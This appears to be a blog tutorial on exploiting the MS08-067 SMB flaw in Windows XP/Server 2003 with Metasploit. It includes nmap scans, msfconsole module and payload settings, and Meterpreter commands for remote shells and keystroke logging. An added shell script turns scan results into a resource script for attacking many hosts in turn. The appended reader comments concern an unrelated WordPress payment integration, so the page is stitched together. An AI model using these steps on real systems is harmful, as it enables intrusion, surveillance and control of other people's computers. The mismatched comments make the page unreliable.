Hacking a Windows PC with Metasploit on BackTrack

Hello guys, in this article I'll show you how to hack a vulnerable Windows XP/Server 2003 PC with Metasploit on BackTrack.

Here I assume you are already familiar with BackTrack, or at least have it installed on your PC or in a virtual machine. If you don't have it yet, or are not familiar with BackTrack or Metasploit, you can read about it and download it here: http://www.backtrack-linux.org/.

Anyway, Metasploit was originally written in Perl but was later rewritten in Ruby. It is basically a large, organised collection of exploit modules, auxiliary scanners, encoders and payloads, plus the console that ties them together. To know more about Metasploit visit the official website here: http://www.metasploit.com/. There is also a version for those that love Windows, so you can use it on your Windows PC. I hate Windows!

Ok, here is my Metasploit terminal; I assume you know how to get there already, because this isn't really a tutorial for beginners.

Anyway, if you still don't know how to get there, here it is: on BackTrack you start the console with the msfconsole command. Remember I'm using BackTrack Linux; on Windows it's easier.

Here is the exploit we are going to use: ms08_067_netapi. It targets MS08-067, a stack buffer overflow in the Windows Server service (the path canonicalisation routine in netapi32.dll) that an unauthenticated attacker can reach over SMB, on TCP 445 or on 139 over NetBIOS, through the SRVSVC named pipe. It's the same bug the Conficker worm used. I recommend using Metasploit on Linux, or at least in a Linux virtual machine; the Windows version isn't that cool.

Once we have Metasploit fired up, we type this (msfconsole passes nmap straight through to the system shell, so you can also run it from a normal terminal):
nmap -sS -Pn -A followed by the IP address of the Windows machine, or by an address range (for example your whole /24) to scan more than one PC on the network.

The address is the local address of the Windows machine I'm scanning. -sS is a SYN scan (it needs root), -A turns on service/version detection and OS fingerprinting, and -Pn tells nmap to skip the ping/host-discovery step and scan every address as if it were up; drop -Pn if you want nmap to find the live hosts first. The report lists each host's open ports and the services (daemons) running on them. On a Windows box you are looking for SMB: 445/tcp (microsoft-ds) and 139/tcp (netbios-ssn). You should find SMB enabled on most of those PCs.

After we find the machine, we run these, in this order (use has to come first, because RHOST and PAYLOAD are options of the module you have loaded):
use windows/smb/ms08_067_netapi loads the exploit we are using. SMB is the file-and-printer-sharing protocol on Windows, and the Server service behind it has the vulnerability we want to exploit.
set RHOST sets the IP address of the remote host (our Windows PC).
set LHOST sets the IP address of our BackTrack PC. It is only needed for reverse payloads (see below); a bind payload never connects back to us.
You may see set THREADS 100 in other write-ups. That option belongs to the auxiliary scanner modules (for example auxiliary/scanner/smb/smb_version, which fingerprints many hosts in parallel), not to this exploit; setting it here does nothing. Run show options before launching to confirm everything is set.

Here is how it looks:

At this point, we use the show payloads command to get a list of suitable payloads.

Here I'm going to use Reflective VNC injection as my payload (the payload is the VNC server DLL, injected straight into the exploited process). Next type:
set PAYLOAD windows/vncinject/bind_tcp and we are all set to attack! With bind_tcp the payload opens a listening port on the target and Metasploit connects to it, so it only works if nothing (a host firewall, for instance) blocks inbound connections to the target; otherwise pick a reverse_tcp variant, which connects back to LHOST.

Next type in exploit and let’s see what happens.
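As an added example (not from the original post), here is a small sh script that strings the scan and the msfconsole steps above together and does them once per host rather than by hand: it pulls every host with TCP 445 open out of nmap's grepable output and writes an msfconsole resource script that loads ms08_067_netapi, sets the payload and LHOST once, and then runs check against each host. The LHOST and the 192.168.56.x addresses are made up for the demo, and the scan output is a constructed sample, not a real scan.

```sh
#!/bin/sh
# Added example (not from the original post): turn nmap's grepable output into an
# msfconsole resource script so the "scan, then set RHOST" steps are done once
# per host instead of by hand. Assumes nmap and msfconsole are installed; the
# IP addresses below are constructed sample data, not a real network.

# Print the address of every scanned host that has TCP 445 open. Reads
# nmap -oG output from stdin (or from files named as arguments). The leading
# space in the pattern stops 1445/open/tcp from matching.
smb_hosts() {
    awk '/Ports:/ && / 445\/open\/tcp\// { print $2 }' "$@"
}

# Write an msfconsole resource script to stdout. $1 is our LHOST (needed
# because the reverse_tcp payload connects back to us); target addresses are
# read one per line from stdin. "check" asks the module whether each host is
# vulnerable without firing the overflow; change it to "exploit" for hosts
# you have confirmed and are allowed to attack.
make_rc() {
    lhost=$1
    printf 'use exploit/windows/smb/ms08_067_netapi\n'
    printf 'set PAYLOAD windows/meterpreter/reverse_tcp\n'
    printf 'set LHOST %s\n' "$lhost"
    while IFS= read -r ip; do
        [ -n "$ip" ] || continue
        printf 'set RHOST %s\n' "$ip"
        printf 'check\n'
    done
}

# Constructed sample of what "nmap -sS -Pn -p 139,445 -oG - 192.168.56.0/24"
# prints: one host with SMB open, one with an unrelated port 1445, one filtered.
SAMPLE_SCAN='Host: 192.168.56.101 ()	Ports: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///	Ignored State: closed (998)
Host: 192.168.56.102 ()	Ports: 1445/open/tcp//unknown///	Ignored State: closed (999)
Host: 192.168.56.103 ()	Ports: 445/filtered/tcp//microsoft-ds///	Ignored State: closed (999)'

# Real use, with the sample replaced by a live scan:
#   nmap -sS -Pn -p 139,445 -oG - 192.168.56.0/24 | smb_hosts | make_rc 192.168.56.1 > ms08_067.rc
#   msfconsole -r ms08_067.rc
printf '%s\n' "$SAMPLE_SCAN" | smb_hosts | make_rc 192.168.56.1
```

Only 192.168.56.101 ends up in the script: the host with 1445 open is skipped because the pattern requires a space before 445, and the filtered host is skipped because its state is not open. Feed the output to msfconsole -r and it will step through the hosts for you.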

Remember, you can still use other payloads too, e.g. I used set PAYLOAD windows/meterpreter/reverse_tcp to get a Meterpreter session on the PC. From there, shell drops you into the PC's command prompt, and Meterpreter's own commands let you reboot or shut down the computer (reboot, shutdown), get the system info (sysinfo) and do other stuff like taking a screenshot (screenshot) and recording keystrokes (keyscan_start, then keyscan_dump).

Hehehe… I luv this, just hacked my Windows XP on my virtual PC!

If the exploit succeeds, you will get a VNC session. If it doesn't, the most likely reason is that the Windows PC has been patched. It isn't really about the service pack: unpatched XP SP1, SP2 and SP3 (and Server 2003 SP0 to SP2) are all vulnerable, and the module has targets for each of them; what matters is whether the October 2008 update (KB958644) is installed. Two things to check before you give up: run check against the target first, since the module can tell you whether the host is vulnerable without actually firing the exploit; and make sure the target (OS version and language) is right, because a wrong return address crashes the Server service, after which further attempts fail until the box is rebooted.

So get an old Windows XP PC and try the exploit on it, as I did with my old Windows XP SP1 in VMware. With this tutorial you should be able to exploit other vulnerabilities on Windows 7, Vista etc. with Metasploit.

To find out about the latest vulnerabilities in Windows and how to exploit them, visit http://web.nvd.nist.gov/view/vuln/search or http://www.exploit-db.com/.

Remember, this is just a tutorial: do not use it on someone else's PC, and I'm not responsible for anything that happens if you try. Anyway, I'm not too sure you will find many people still using Windows XP SP1, but if you do, good luck to you.

Microsoft fixed this bug a long time ago, in the October 2008 bulletin MS08-067: http://technet.microsoft.com/en-us/security/bulletin/ms08-067.

I write code... web, mobile, desktop and hack stuff

Responses
  • shola daniels
    Sep 12, 2012

    I'm using the wp-ecommerce plug-in in WordPress. I'm sure it'll work too
    • neyo
      Sep 13, 2012

      Yes, as long as you can get the required parameters… you will need to modify the plugin though.
  • shola daniels
    Sep 12, 2012

    Has anyone tried the integration in WordPress?
  • Fresh
    Nov 22, 2012

    You are doing a fantastic job Tunde. Keep it up

  • pete
    Feb 4, 2013

    Thank you Mr Tunde, you are the best. Keep it up bro
  • Cyril
    Mar 15, 2013

    Nice work. I really appreciate it. How about part 2?
  • Otobong Colby
    May 31, 2013

    Hello bro, please how do I integrate Interswitch into a hotel website in WordPress?
  • FunmiOgunlesi
    Jul 23, 2013

    You don't mention generating a hash?
    I'm sure that the Interswitch website said we had to generate a hash…
  • Udeze 'Kene
    Jul 23, 2013

    It's great what you've done here Tunde. Gratitude
